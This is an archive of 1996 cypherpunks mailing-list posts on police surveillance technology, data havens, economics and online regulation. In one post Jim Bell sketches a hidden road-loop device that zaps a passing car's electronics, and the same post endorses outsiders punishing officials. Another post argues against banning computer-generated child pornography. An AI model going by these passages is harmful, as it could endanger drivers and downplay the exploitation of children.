>   professionals to bounce off ideas," said Ira Wilsker, a former police
>   officer who is leading a series of U.S. Department of Justice seminars
>   on law enforcement and the Internet.
   
>   Run for and by police officers, the computer exchanges often offer
>   information that cannot be found elsewhere, Wilsker said. For example,
>   police raised the alarm on the Internet about illegal use of Rohypnol,
>   the notorious "date rape" sedative, more than a year before warnings
>   about the drug were issued through official channels, he said.
   
>   On the philosophy of know thy enemy, Wilsker said police also turn to
>   the Internet as an intelligence source, monitoring online chatter by
>   hate groups, drug users and others who discuss their views on computer
>   news groups. These news groups, though commonly thought of as private
>   communications, are open to public view.
   
>   The Internet also can be an effective people finder, he said.
   
>   For example, more than 90 million people and their telephone numbers
>   and addresses can be found at the Internet site www.switchboard.com,
>   making a nationwide search sometimes as simple as keying in a name, he
>   said. The service is free.
   
>   With an address in hand, Wilsker advises police to turn to
>   www.mapquest.com, which in seconds can pinpoint on a map the location
>   of a suspect's home.
   
>   "We use it for serving warrants where we don't know the area," he
>   said.
   
[...]

>   Still, the response to serious attempts at online policing at times
>   has been disappointing. The vast majority of people prefer to deal
>   directly with police than go online to report a crime. Chicago's
>   effort to elicit information about drug dealing over the Internet has
>   drawn only a smattering of responses. Some departments have dropped
>   their most-wanted postings on the Internet because they brought in so
>   few tips.
   
[...]

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lewis Koch <lzkoch@mcs.net>
Date: Tue, 13 Aug 1996 12:17:58 +0800
To: cypherpunks@toad.com
Subject: Snake Oil wanted
Message-ID: <199608130016.TAA23180@Kitten.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain



I am a journalist who has specialized in investigative reporting.  I have
been writing about and for the Net for about nine months, though I have
about three decades as a reporter/columnist/author.

There has been some discussion on this list of one story that I broke --
that of Deputy Attorney General Jamie S. Gorelick's speech "National
Security in the Information Age" delivered at the U.S. Air Force Academy 29
February 1996 in which she calls for the development of a "Manhattan
Project" to counter computer hackers.  The column and her complete speech
can be found at http://upside.master.com/online/columns/cybersense/9607.html
"U.S. Deputy Attorney General Jamie S. Gorelick Speaks Out Against Freedom
and Security on the Internet."

The story was published in a monthly column Cybersense which I write for
Upside Magazine's Website.

I am currently interested in writing about snake oil, especially as it
relates to claims about ensuring e-mail privacy, total computer security,
plug-and-play effortless encryption or hype relating to computer crime --
its origins, its prevalence, its prevention.

My Net audience is composed of people who perhaps pretend to more
sophistication that they truly have but who I think are most interested in
clarity.    

My areas of expertise are non-technical.  Over three decades, however, I
have proven record of investigative reporting.  

I have been fortunate to meet and rely on some very responsible people to
guide me through the technical thickets -- some of whom are members of this
List.

Any form of response is acceptable and all confidences will be respected.

     
Lewis Z. Koch
lzkoch@mcs.net
http://www.upside.com
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzHn8xwAAAEEANNKB31dvtigkO5ojKKBAjbrRhkTCrzg3vwhiQ0iS1Ubrxk8
HG/pMYjV4eCR3dZrekbI5/gvNPIG9yRdY8AA3THF761XWHiYZKyhQ8OHxNyjAgSA
jze+joT9559kQY++xiayAGK/0sd3P9ByUT+5yy3g9bNBV+vX9vA+Q6AhQTctAAUR
tA5semtvY2hAbWNzLm5ldA==
=YZQ8
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 13 Aug 1996 11:04:15 +0800
To: cypherpunks@toad.com
Subject: Yet another blame-the-Internet-for-child-porn
Message-ID: <01I876WBU7C89JD5RL@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain



	They are, of course, failing to answer the question of why encouraging
people to consume _computer-generated_ child pornography should be considered
a justification for legal intervention, not to mention that such an effort
would also make putting _Lolita_ on the Internet illegal (text could drive
up demand for it as well, after all), or even political speech such as from
NAMBLA. (It's political speech just as much as material from neo-Nazis... or
from the Demopublicans.)
	There is also the lack of realization that someone can't be "exploited"
except in the Marxist sense on the Internet... only when the material is
originally made. Another point is that countries do differ on when is
considered old enough for voluntary participation in making pornography -
Tracy Lords material is legal in much of Europe, for instance.
	I'd also point to the media bias evident; they only quoted from
people who were in favor of governmental regulation. Fortunately, as even
one of the people at this "world congress" admitted, governmental regulation
of free speech on the Internet will ultimately fail. Prevent actual harm -
the _production_ of child pornography.
	-Allen

>   Centura
>                  WORLD CONGRESS TO FIGHT INTERNET CHILD PORN
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service
      
>   STOCKHOLM (Aug 11, 1996 12:29 p.m. EDT) - Distribution of child
>   pornography on the Internet seems destined to top the issues at the
>   world's first conference against sexual exploitation of children
>   opening later this month in Stockholm.
   
>   Activists are trying devise ways of keeping pedophiles from peddling
>   such material on the global computer network, which is already used as
>   a billboard to advertise prostitution and sex tourism and to exchange
>   adult pornography.
   
>   "The Internet is like heaven for the pedophile," said Toby Tyler, a
>   United States police officer who lectures at the Federal Bureau of
>   Investigation (FBI) academy on child abuse.
   
>   "As far as our ability to restrict the distribution of child
>   pornography and stop the sexual exploitation of children on the
>   Internet...it's not something that can be done."
   
>   Campaigners are concerned that unless urgent action is taken to stamp
>   out the Internet's distribution of child porn, whether it features
>   real children or just computer generated images, it could spark
>   greater demand for child pornography.
   
>   Tyler said the Internet has ended the days when pedophiles had to make
>   costly cross-border runs to buy child pornography in countries where
>   laws were laxer and penalties lighter.
   
>   Now they can obtain and distribute films and photos from their own
>   homes on the Internet with little risk of capture.
   
>   But not everyone agrees that regulating the internet or its 20 million
>   users worldwide is the right move.
   
>   Some advocates say the Internet represents free speech.
   
>   Others argue that the distribution of child pornography on the
>   Internet is not that widespread.
   
>   Margaret Healy from Bangkok-based End Child Prostitution in Asian
>   Tourism (ECPAT) said in a report prepared for the five-day Stockholm
>   conference which opens Aug. 27 that the regulation of child
>   pornography on computers presents special challenges and called on
>   governments to fund better training.
   
[...]

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 13 Aug 1996 10:10:56 +0800
To: cypherpunks@toad.com
Subject: Re: Rumors of death of Anguilla Data are greatly exagerated.
In-Reply-To: <9608121346.AB00628@anon.penet.fi>
Message-ID: <v0300782bae356bdcdf99@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:51 PM -0400 8/12/96, Vince wrote:
> Many fortune 500 companies have offshore corporations for "self
> insurance".  Many many movies have corporations offshore just for that
> movie.  These are type of "clean" corporations that taxhavens like.

George Soros' Quantum Fund is an "NV" corporation, domiciled in the
Netherlands Antilles, for instance. We went over this about two years ago,
but the original  ;-) connotation of "e$" was eurodollar, or expatriate
dollars held outside the US banking system. For a decade or so, maybe
still, this was an excellent way to raise money for US corporations. Most
of the Fortune XX companies did this stuff, and probably still do, all to
avoid Uncle's sticky fingers.

While we may be talking about something else here entirely :-), remember
that tax avoidance is not necessarily tax evasion. And, of course,
jurisdiction shopping ("regulatory arbitrage") isn't necessarily breaking
the law.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 13 Aug 1996 15:02:16 +0800
To: cypherpunks@toad.com
Subject: Re: Article on Electronic Commerce with a few too many
Message-ID: <199608130312.UAA15239@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:19 PM 8/12/96 EDT, Dr.Dimitri Vulis KOTM wrote:
>jim bell <jimbell@pacifier.com> writes:
>> I too find this concept offensive, at least to the extent that it is kept a
>> secret from the marketplace. Even so, as a libertarian and free-market
>> capitalist, I certainly see nothing wrong with "allowing such behavior," and
>> indeed  I'd see something wrong with NOT "allowing" it.  Nevertheless, to
>> the extent it occurs it should be well understood and identified for what it
>> is.
>
>This reminds me of the recent revelation how a major disposable lens maker
>was marketing three lines of lenses: cheap ones, good for a few days;
>medium ones, good for a week; very expensive ones, good for a month.
>You guessed it - the lenses inside the packaging were identical.
>
>(I find that most self-described "libertarians" are actually fucking 
statists.)

I don't see how that last statement follows anything that went before.  I 
made it explicitly clear that companies have a right to market in such ways; 
I also have a right to dislike those methods.  

As for other libertarians, I don't see that they're appreciably different.  So 
where did that last comment come from? 

BTW, your KOTM credential is outdated...are you trying to have it renewed?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 13 Aug 1996 15:53:53 +0800
To: cypherpunks@toad.com
Subject: Re: "X-Ray Gun" for imperceptible searches
Message-ID: <199608130312.UAA15244@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:43 PM 8/12/96 -0700, Mike Duvos wrote:
>Color me skeptical.
>
>"E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU> writes:
>
> > The gadget doesn't send out X-rays; instead, it picks up
> > electromagnetic waves emitted by human flesh.
>
>Would these electromagnetic waves be something distinct from the
>blackbody spectrum of a human-sized blob of "mostly water" at the
>appropriate temperature?
>
>Or to put it another way, is this just a sophisticated IR imager
>thickly coated in snake oil and marketing hype?

That depends on what you mean by "IR."  Near-IR is about 300 Terahertz; I've 
seen some items in electronic magazines recently concerning systems that 
emit and receive around 1 terahertz.  Apparently, they can read writing in 
envelopes, etc.  It isn't clear whether this particular system is more like 
a thermal IR system, or one of those newer ones.

Chances are good that when such a system is produced, it will be produced 
WITHOUT any kind of recording system that must be installed.  The problem 
is, this leaves it open to interpretation as to what a cop saw, and judges 
and juries tend to be too deferential to cops who "are trying to protect 
us."  All a cop has to do is to claim he saw a gun, or drugs, or practically 
anthing else, and suddenly he has probable cause where he wouldn't have had 
it before.  Yet more abuse with no obvious benefit.

All the more reason to adopt an AP-type system:  The so-called "justice 
system" rarely punishes its own; if we are to have a realistic deterrent, 
the only way to do it is to let outsiders deal with abuse.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 13 Aug 1996 14:32:40 +0800
To: cypherpunks@toad.com
Subject: Re: Article on Electronic Commerce with a few too many
In-Reply-To: <199608122000.NAA19713@mail.pacifier.com>
Message-ID: <PePksD97w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:
> I too find this concept offensive, at least to the extent that it is kept a
> secret from the marketplace. Even so, as a libertarian and free-market
> capitalist, I certainly see nothing wrong with "allowing such behavior," and
> indeed  I'd see something wrong with NOT "allowing" it.  Nevertheless, to
> the extent it occurs it should be well understood and identified for what it
> is.

This reminds me of the recent revelation how a major disposable lens maker
was marketing three lines of lenses: cheap ones, good for a few days;
medium ones, good for a week; very expensive ones, good for a month.
You guessed it - the lenses inside the packaging were identical.

(I find that most self-described "libertarians" are actually fucking statists.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Tue, 13 Aug 1996 18:13:30 +0800
To: cypherpunks@toad.com
Subject: Re: photographed license plates
In-Reply-To: <1.5.4.16.19960811231209.3c677258@arc.unm.edu>
Message-ID: <199608130335.UAA03631@dfw-ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




At 08.23 AM 8/9/96 -0700, i am not a number! wrote:
>O, and I think they're talking more about putting up cameras at some 
>troubling intersections to take pictures of cars running red-lights.

http://www.panix.com/~sshah/ss-nyred.htm gives a detailed listing of New York 
City intersections where this is already being done.

http://www.eng.uci.edu/vtm/freeway.html describes the techniques used to monitor 
traffic speeds, etc. with a camera. Includes several pictorial examples.

http://www.azfms.com/faq.html (Arizona DOT) gives some interesting (but suspect) 
info about freeway / camera interaction, as well as a bunch of traffic webcams 
and links to similar sites. The claim is made that license plates can only be 
read by the camera when a vehicle is stopped...

http://www.best.com/%7Elspencer/geoch/ is a page hawking remote sensor devices 
(Butt-Sniffers) for identifying "gross polluter' vehicles. These same sensors 
are being deployed on California freeways in the Bay Area, and owners of "gross 
polluting" vehicles receive citations in the mail. The page includes details on 
the advantages of large companies using Butt-Sniffers on their employees' 
vehicles. "By finding gross polluting employee vehicles via remote sensing, and 
selectively repairing or scrapping them, the employer can gain AVR compliance." 
A great example of the (not-so) subtle arm-twisting CARB is doing to implement 
Smog Check II...

http://www.primenet.com/~rstbear/biffl.html Biff the Bear's Potty Cam! A great 
place for car-grabbing (and most other) bureaucrats to go.
Jonathan Wienke

"Today Americans would be outraged if U.N. troops entered Los Angeles to restore 
order; tomorrow they will be grateful! This is especially true if they were told 
there was an outside threat from beyond, whether real or promulgated, that 
threatened our very existence. It is then that all peoples of the world will 
pledge with world leaders to deliver them from this evil. The one thing every 
man fears is the unknown. When presented with this scenarios, individual rights 
will be willingly relinquished for the guarantee of their well being granted to 
them by their world government."
--Henry Kissinger in an address to the Bilderberg organization meeting at Evian, 
France, May 21, 1992. Transcribed from a tape recording made by one of the Swiss 
delegates.

"A conservative is a liberal who got mugged last night."
--Lee Rodgers

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 13 Aug 1996 15:15:51 +0800
To: cypherpunks@toad.com
Subject: Re: Police prepare stunning end for high-speed car chases
Message-ID: <199608130343.UAA16999@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:54 AM 8/12/96 -0700, Timothy C. May wrote:

>
>(And I'm not ignorant of such technologies, having attended several of the
>Nuclear and Space Radiation Effects Conferences. I also played around with
>this as a minor plot element in a novel I was working on several years ago,
>namely, a character killed in Los Alamos when the Electronic Engine Control
>circuitry of his BMW was zapped while on a mountain road. This, by the way,
>is a "side effect" of widely deploying such EM cannon technologies--people
>using them on twisty mountain roads. I can think of some places near Big
>Sur and around Devil's Slide where such a gizmo would produce real
>interesting effects!)

Why would you need an "EM Cannon" for this?  Just string a 1-car-sized loop 
of wire on the surface of a road, and off in the bushes hide a battery, 
DC-to-Hi voltage DC converter and 20kv+ capacitor, and a vacuum switch or 
some other switch arrangement.  When the car in question traverses the loop, 
short the switch and the car will be blasted with 20,000 volt-turns of 
induction.  Sure, most of it will pass harmlessly through the car's steel, 
but even iron has a limited "mu" which means that every electrical device in 
the car will be subjected to a certain amount of induced EMF, probably 
enough to at least reset a few microprocessors and possibly even destroy them.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 13 Aug 1996 15:07:30 +0800
To: Weld Pond <cypherpunks@toad.com
Subject: Re: "X-Ray Gun for imperceptible searches
Message-ID: <2.2.32.19960813034347.00ab6534@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:36 PM 8/12/96 -0400, Weld Pond wrote:

>This thing sounds like it could be easily defeated by sewing some "space 
>blanket" material on the inside of coats, etc.  

You could probibly build little clip on active jammers.  (With published
specs to the "Evil Internet(tm)".)  Such intrusive methods should be pretty
easy to screw up with proper detail on their operation.  (I expect the 2600
crowd will have jammer kits available soon.  And working ones a few months
after that...)

>Maybe jackets that 
>show up false positives with gun shaped cutouts will become 
>fashionable with the already harrassed inner-city set.

I want one that will make me show up as a multi-tentacled alien horror from
beyond space and time.  Why make them wig out and shoot you when you can
really mess with their minds...?




---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 13 Aug 1996 15:22:56 +0800
To: "Erik E. Fair" (Time Keeper) <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: "X-Ray Gun" for imperceptible searches
Message-ID: <2.2.32.19960813035436.00b058b4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:42 PM 8/12/96 -0700, Time Keeper wrote:
>I wonder how well the imager works through mylar or gold lame' clothing (or
>other high-metal content clothing)?

You will be required to escrow such clothing with the proper government
authorities.  Inspections will be done by the Bureau of cocktails, discos,
and munitions according to strict rules set down by President Clinton, with
advisement from Former Sen. Bob Packwood. 

Actually they will just use harder radiation in those cases.  The higher
cases of radiation burns and sickness will be offset by the gains in
perceived public safety.

"Eyes melt. Skin explodes. Everybody dead!" - An unnamed source at the FBI.
---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gelona <gelona@worldnet.att.net>
Date: Tue, 13 Aug 1996 13:28:21 +0800
To: cypherpunks@toad.com
Subject: test-1
Message-ID: <320FD48A.6A9E@worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


from:gelona@worldnet.net.att

To:cypherpunks@toad.com

::
Request~Remailing to :BuzzRBee@juno.com



Test-1 , done at 9.03




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 13 Aug 1996 15:20:52 +0800
To: Bart Croughs <bart.croughs@tip.nl>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <01BB88A7.14E3A5C0@groningen04.pop.tip.nl>
Message-ID: <199608130106.VAA16957@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bart Croughs writes:
> Perry Metzger wrote:
> 
> >Bart Croughs writes:
> >> 	 But there is another axiom of economics which the
> >>nationalist/socialist can use for his case against the free movement of
> >> capital. This axiom states that the wages of workers depend on the
> >> amount of capital invested. The more capital invested, the higher the
> >> wages are.
> 
> >This must be some new axiom of economics that I had not heard of.
> 
> It's not a sin to be ignorant, but to boast about it...  I recommend
> you read the great libertarian /austrian economists: Murray
> Rothbard, Henry Hazlitt, etc.

Perhaps I should start being more vicious when I'm using sarcasm.

Nowhere in the writings of any Austrian economist will you find anything
claiming that the wages for a given job are linked to capital
investment by the employer.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Greg Kucharo" <sophi@best.com>
Date: Tue, 13 Aug 1996 15:05:02 +0800
To: <cypherpunks@toad.com>
Subject: Rumors of death of Anguilla Data are greatly exaggerated
Message-ID: <199608130417.VAA01967@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


 In the Swiss system, who dictates to the banks thier policies about who
and what they can store?  Do the banks have enough influence to sway
lawmakers?  It seems to me that the issue is not illegality, but rather if
the depositor is a viable political entity with "something on the other
guy".  When the Nazis or Columbian drug dealers are still in power, the
Swiss look the other way.  As soon as these types fall to other forces, the
Swiss hand over the goods to the victors.  I think if you were to
sucessfully store information that a large power finds personally
objectionable, the best solution is to play  both sides.  Scenario; The
U.S. leans on the Anguilla authorities to close down Vince.  Vince goes to
the British consulate and negotiates for the depositing of some nasty
information about the Queen or something.  The British lean on the
Americans to lay off.
  A little far feteched but you get the idea.  And it would work in the
majority of situations.  I bet money stashed by Hitler and Goebbels got
confiscated after World War II.  But Gerhard Whelen got his loot when he
linked up with the CIA.



???????????????????????????????????????
Greg Kucharo
sophi@best.com
"People want chaos for about 5 minutes.  Then 
they want some money and a backrub."
                                -Bruce Sterling
???????????????????????????????????????




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Schryvers <schryver@radiks.net>
Date: Tue, 13 Aug 1996 14:22:01 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible searches
Message-ID: <199608130242.VAA11177@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:56 PM 8/12/96 EDT, you wrote:
Since metal blocks the waves and stands out on the screen one could affectively
block its use by putting up a fine metal mesh on the interior of all walls 
that are exterior to the house.  The same could be said for clothing that 
looks normal but has a metal mesh liner, like say a trench coat.

>	I would wonder if a jamming device (preferably area-effect with a 
>slowly randomly varying swathe of area, to avoid figuring out who was carrying
>it) would be possible, or some variety of shielding (i.e., emitting waves
>looking similar to flesh).
>	-Allen
>
>>   Direct Media
>>                    NEW X-RAY GUN TRADES PRIVACY FOR SAFETY
>>      Copyright &copy 1996 Nando.net
>>      Copyright &copy 1996 The Associated Press
>
>>   SANTA MONICA, Calif. (Aug 12, 1996 09:47 a.m. EDT) -- The latest
>>   weapon against terrorism can see right through you.
>   
>>   The Passive Millimeter Wave Imager can X-ray through clothing to "see"
>>   a concealed weapon, plastic explosives or drugs. A police officer can
>>   surreptitiously aim it into a crowd from as far away as 90 feet.
>   
>>   The new X-ray gun is becoming a symbol for an unlikely alliance of
>>   civil libertarians and gun owners who fear the fight against crime and
>>   terrorism may be waged at the expense of personal freedoms.
>   
>>   "I'm incredibly concerned," said John Henry Hingson, a past president
>>   of the National Association of Criminal Defense Lawyers, meeting here
>>   this past week. "The entire nation could become a victim of illegal
>>   searches and seizures and the law is powerless to protect them from
>>   these police abuses."
>   
>>   But in these nervous times following the the crash of TWA Fight 800
>>   and bombings at the Olympics, Oklahoma City and the World Trade
>>   Center, many Americans are now willing to trade some of their privacy
>>   and civil liberties for greater security.
>   
>>   A poll last week by the Los Angeles Times found that a majority of
>>   people -- 58 percent -- said they would curtail some civil liberties
>>   if it would help thwart terrorism. Thirteen percent said it would
>>   depend on what rights were at stake. The poll didn't ask people to
>>   single out any rights.
>   
>>   The Clinton administration has proposed increased wiretapping and
>>   other anti-terrorism steps, and is doling out research grants for
>>   cutting edge anti-crime technology that once may have been intended
>>   for only military use.
>   
>[...]
>   
>>   Two models are being developed of the Passive Millimeter Wave Imager,
>>   a creation of Massachusetts-based Millimetrix Corp.
>   
>>   The larger one, about the size of a shoebox, is mounted on a patrol
>>   car and pointed at the unsuspecting person. The gadget doesn't send
>>   out X-rays; instead, it picks up electromagnetic waves emitted by
>>   human flesh.
>   
>>   Anything that stands in the way of those waves -- like a gun -- or
>>   anything that emits weaker waves -- like a bag of cocaine or a plastic
>>   explosive -- will show up on a little screen in the patrol car.
>   
>>   Clothes emit no waves. Neither do walls, allowing the device to be
>>   used from even outside a room.
>   
>>   A second model is a smaller, battery-operated version that an officer
>>   can operate by hand, like a radar gun.
>   
>>   Millimetrix hopes to field test the larger model soon at a police
>>   agency.
>   
>>   Hingson argues the device runs roughshod over bans against illegal
>>   searches and seizures. The law says police can stop and frisk a person
>>   only when an officer has a "reasonable suspicion" the person is armed
>>   or involved in a crime.
>   
>>   Millimetrix points out that while the imager can see through clothing,
>>   it still leaves people some privacy. The device's display screen, the
>>   company says, "does not reveal intimate anatomical details of the
>>   person."
>   
>>   Chip Walker, spokesman for the National Rifle Association, noted that
>>   devices like the imager threaten the legal rights of people in 31
>>   states who are allowed to carry concealed weapons with proper
>>   licenses.
>   
>>   "We certainly support efforts to disarm criminals, but we need to be
>>   careful that we're not painting with too broad a brush here," he said.
>   
>>   Walker said that as troubling as terrorism is, people may be playing
>>   into terrorists' hands by giving up their privacy.
>   
>>   "One of the broader issues is that if we start giving up certain civil
>>   liberties, that essentially means that the terrorists are starting to
>>   accomplish one of their goals," he said.
>
PGP encrypted mail preferred.  
E-Mail me for my key.
Scott J. Schryvers <schryver@radiks.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Tue, 13 Aug 1996 14:26:53 +0800
To: cypherpunks@toad.com
Subject: Re: "X-Ray Gun for imperceptible searches
Message-ID: <Pine.BSD/.3.91.960812223251.18576A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain



This thing sounds like it could be easily defeated by sewing some "space 
blanket" material on the inside of coats, etc.  Maybe jackets that 
show up false positives with gun shaped cutouts will become 
fashionable with the already harrassed inner-city set.

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Kennedy <76702.3557@compuserve.com>
Date: Tue, 13 Aug 1996 13:43:45 +0800
To: BlindCopyReceiver:;
Subject: Hoax: A ban on cryptography?
Message-ID: <960813023753_76702.3557_CHN38-4@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


My mailer thinks the e$pam list pulled this from cypherpunks:

>>                                             S.1666
 
 Department of Commerce Authorization Act for Fiscal Year 1997 (Passed by the
 Senate) <<

And this is bogus, and as far as I can tell not a typo, it's complete hokum.

S.1666 is an obscure bill about courts in Utah.

A search of http://thomas.loc.gov on "encryption" reveals the expected bills,
PRO-CODE etc.

A search for the DoC Authorization Act reveals nothing, as far as I can tell
this bill has not been drafted let alone passed. I don't know enough about how
the DoC is funded to know if they get their own Authorization Act or receive
authorizations piecemeal and by the reconciliation.

Again, this is bogus.

!^NavFont02F02350014QGHHG|MG~HG85QG87HI}2126





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 13 Aug 1996 17:03:52 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: "X-Ray Gun" for imperceptible searches
In-Reply-To: <01I876465KRK9JD5RL@mbcl.rutgers.edu>
Message-ID: <Pine.SV4.3.91.960812230929.6259R-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


CCW holders don't have a legal right to conceal their possession of 
weapon, from the police.

I believe that use of this device would be unconstitutional in a 
jurisdiction which doesn't license concealed carry - to wit, Vermont ONLY.
If you are a licensee, you exercise your privilege at the pleasure of the 
Sovereign.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 13 Aug 1996 14:50:26 +0800
To: Bart Croughs <bart.croughs@tip.nl>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <01BB88AF.40553180@groningen04.pop.tip.nl>
Message-ID: <199608130329.XAA17152@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bart Croughs writes:
> >Clearly, wages are defined by supply and demand -- not by "capital
> >investment".
> 
> When economists say that wages are determined by the amount of capital
> invested, they mean on a regional/national level, not on the level of
> individuals.

So, you are saying that if everyone in the country spent their life
savings on building giant green pylons, the capital investment would
drive up everyone's wages? Wow! In fact, we could borrow money from
other countries to build more green pylons and drive up wages so fast
we could pay off the resultant debt!

Perry

(PS Please stop posting these things -- you may kill everyone watching
with laughter.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Tue, 13 Aug 1996 09:08:46 +0800
To: "'cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB88A7.0A479540@groningen04.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain




Sandy Sandfort wrote:

>On Sun, 11 Aug 1996, Bart Croughs wrote:

>> If American companies are moving capital to Third World
>> countries because of the low wages in these countries, then the
>> workers in the Third World will of course be better off. But in
>> the US, the amount of capital will be lowered. So the American
>> workers will be able to get other jobs, but these jobs will pay
>> less, because of the diminished amount of capital in the US.

>The fallacy in this argument is the assumption that because some
>American capital moves overseas, there will be less capital 
>available in the US for investment/wages. It doesn't contemplate
>infusion of foreign capital investments in American industries 
>that have a competitive advantage over their foreign competition.

At least you agree that wages are determined by the amount of capital invested! As to your argument, I don't see why the movement of American capital overseas would lead to the infusion of foreign capital investments in American industries. It seems to me that these two processes work independently. If they do work independently, then the movement of American capital overseas will lead to less capital in the U.S. 


      Bart Croughs












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Tue, 13 Aug 1996 09:35:56 +0800
To: "'cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB88A7.0F5BA1C0@groningen04.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


My statement that the wages depend on the amount of capital invested, has received a bad press. I thought cypherpunks were economically literate, so I didn't explain the principle and I didn't give any sources for further reading. This proved to be a mistake.
	To avoid this kind of uninformed criticism in the future, I recommend my critics read the following books, which can all be ordered from Laissez-Faire Books: 1) The economics of liberty (ed. L. Rockwell); 2) The free market reader (ed. L. Rockwell) - both books were published by the Ludwig von Mises Institute. 3) Economics in one lesson - Henry Hazlitt. These three books contain popular essays about economics, following the principles of the austrian school, the most radical free market school in economics.

Some quotes:
	Henry Hazlitt in 'economics in one lesson' (p. 139): "The best way to raise wages, therefore, is to raise marginal labor productivity. This can be done by many methods: by an increase in capital accumulation - i.e. by an increase in the machines with which the workers are aided..."
